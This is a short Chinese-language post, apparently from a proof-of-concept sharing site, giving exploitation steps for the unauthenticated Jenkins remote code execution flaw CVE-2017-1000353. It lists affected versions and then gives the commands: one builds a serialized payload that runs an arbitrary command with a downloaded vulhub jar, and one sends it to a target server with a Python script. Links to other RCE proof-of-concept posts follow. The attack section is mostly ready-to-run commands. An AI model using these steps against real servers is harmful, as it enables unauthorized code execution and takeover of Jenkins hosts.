POC Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353）

Shacker · 09 13, 2024

Python:

## 漏洞概述

攻击者使用该漏洞可以在被攻击服务器执行任意代码，漏洞利用不需要任何的权限

## 影响范围

```http
Jenkins <=2.56
Jenkins LTS <= 2.46.1
```

## 漏洞利用

1、下载[CVE-2017-1000353-1.1-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar)，这是生成POC的工具

执行下面命令，生成字节码文件

```bash
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

# jenkins_poc.ser是生成的字节码文件名
# "touch ..."是待执行的任意命令
```

2、将刚才生成的字节码文件发送给目标

```bash
python CVE-2017-1000353.py http://your-ip:8080 jenkins_poc.ser
```

	POC Jenkins 远程命令执行漏洞（CVE-2018-1000861） Shacker 09 13, 2024 POC/?Day
	POC Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109 Shacker 09 13, 2024 POC/?Day
	POC 访问控制缺失及远程代码执行漏洞（CVE-2019-7238） Shacker 09 13, 2024 POC/?Day
	POC TMUI 远程代码执行漏洞（CVE-2020-5902） Shacker 09 12, 2024 POC/?Day
	POC Jenkins 远程命令执行漏洞 Shacker 09 13, 2024 POC/?Day